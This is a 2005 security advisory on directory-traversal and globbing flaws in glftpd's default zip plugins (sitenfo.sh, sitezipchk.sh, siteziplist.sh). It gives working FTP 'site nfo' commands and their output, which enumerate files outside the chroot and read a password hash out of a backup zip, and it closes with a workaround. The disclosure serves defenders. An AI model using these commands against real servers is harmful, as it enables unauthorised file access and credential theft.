Pimp industries.
      "Its all about the Bling, B^!%@s and Fame!"

Multiple vulnerabilities in Glftpd v1.26 - v2.00 default zip based plug-ins
: sitenfo.sh, sitezipchk.sh, siteziplist.sh

      (C) Paul Craig - Pimp Industries 2005


Background
-------------
glftpd is an open source ftp server used by the more 'hardcore' of ftp
servers :) (www.glftpd.com)


Exploit:
-------------
The exploit is not in glftpd itself, instead inside a suite of zip based
plug-ins that come with the glftpd package by default, these plug-ins are
widely used in installations of glftpd.
This advisory will focus on the plugin sitenfo.sh, a script to allow users
to read .nfo and .diz files from within zip archives("SITE NFO" by
default). Although the exploits are synonymous with all the .sh scripts
listed above.

Due to improper input validation several flaws exist in the script that
can allow for unprivileged access to files within the glftpd chroot and
information disclosure of private files

Firstly.
Directory transversal to prove the existence of a valid file outside of
the ftp siteroot:

ftp> site nfo ../etc/grouap
200- dn's NFO Lister v1.00
200-
200- That zipfile (../etc/grouap)  does not exist!
200 Error executing command.
ftp> site nfo ../etc/group
200- dn's NFO Lister v1.00
200-
200- nfo(s) from ../etc/group:
200-
200 Command Successful.

Here we determine that the file ../etc/group exists, a file outside of the
default FTP site root.

Secondly.
Directory transversal globbing attack:
Due to improper parsing of *, a user can return the first two files in any
directory ($1 $2), including files within 'private' or hidden directory's
such as the 'staff' folder.

ftp> site nfo ../../../../../etc/*
200- dn's NFO Lister v1.00
200-
200- ../../../../../etc/group from ../../../../../etc/ftpd-dsa.pem:

and to view inside private folders within the ftp root (that usually you
are unable to see)

ftp> site nfo staff/*
200- dn's NFO Lister v1.00
200-
200- staff/Mark from staff/Peter:
200- Command Successful.
ftp> cd staff
200- No such file or directory.

Here we can see that staff/Mark and staff/Peter exist, although we are
unable to even see the directory staff/ by default, since we have no
access.

This can be further exploited to build a full directory tree by using
guided wildcards within the globbed request, such as.
site nfo ../../../../../etc/a*
site nfo ../../../../../etc/b*
site nfo ../../../../../etc/c*

And so on and so forth to list all valid files and directories.

Finally you can use the script to also view any file inside any zipfile
within the glftp root, such as backups or zipfiles in private directories.

First, we find a zip file.

ftp> site nfo ../../*.zip
200- dn's NFO Lister v1.00
200-
200- nfo(s) from ../../backup.zip:

backup.zip exists outside the glftpd site root and is returned in $1 to
sitenfo.sh

Now we will read all files within backup.zip that begin wtih 'p'
ftp> site nfo ../../backup.zip p*
200- dn's NFO Lister v1.00
200-
200- passwd from ../../backup.zip:
200-
glftpd:$c8aa2099$89be575337e36892c6d7f4181cad175d685162ad:0:0:0:/site:/bin/false

This will of cause only work for zip compressed files, not gzip files.

Combined, these flaws allow a user to browse the glftp chrooted
environment and then read any file inside any zip file. Considering zip
files may contain sensitive information such as backups or private
documents, this exploit could easily lead to further privilege escalation.

sitezipchk.sh and siteziplist.sh both contain similar exploits, although I
have noticed sitenfo.sh is more frequently used in glftpd sites.

Suggestions/Work Around:
-------------

Easy solution is to remove sitenfo.sh, siteziplist.sh and sitezipchk.sh
from the /bin directory, passing user supplied arguments to shell is never
bright and is not worth the security risk.


Company status
---------------
Pimp Industries is a privately owned New Zealand based security research
company.
If you would like to contact Pimp Industries to discuss any nature of
business, please email us at headpimp at pimp-industries.com.


Personal Pimp Hello's fly to:
-------------------
The boys at security-assessment.com, pinky, sozni, and you! yes, you!

Paul Craig
Head Pimp, Security Researcher
Pimp Industries
"Move fast, think faster"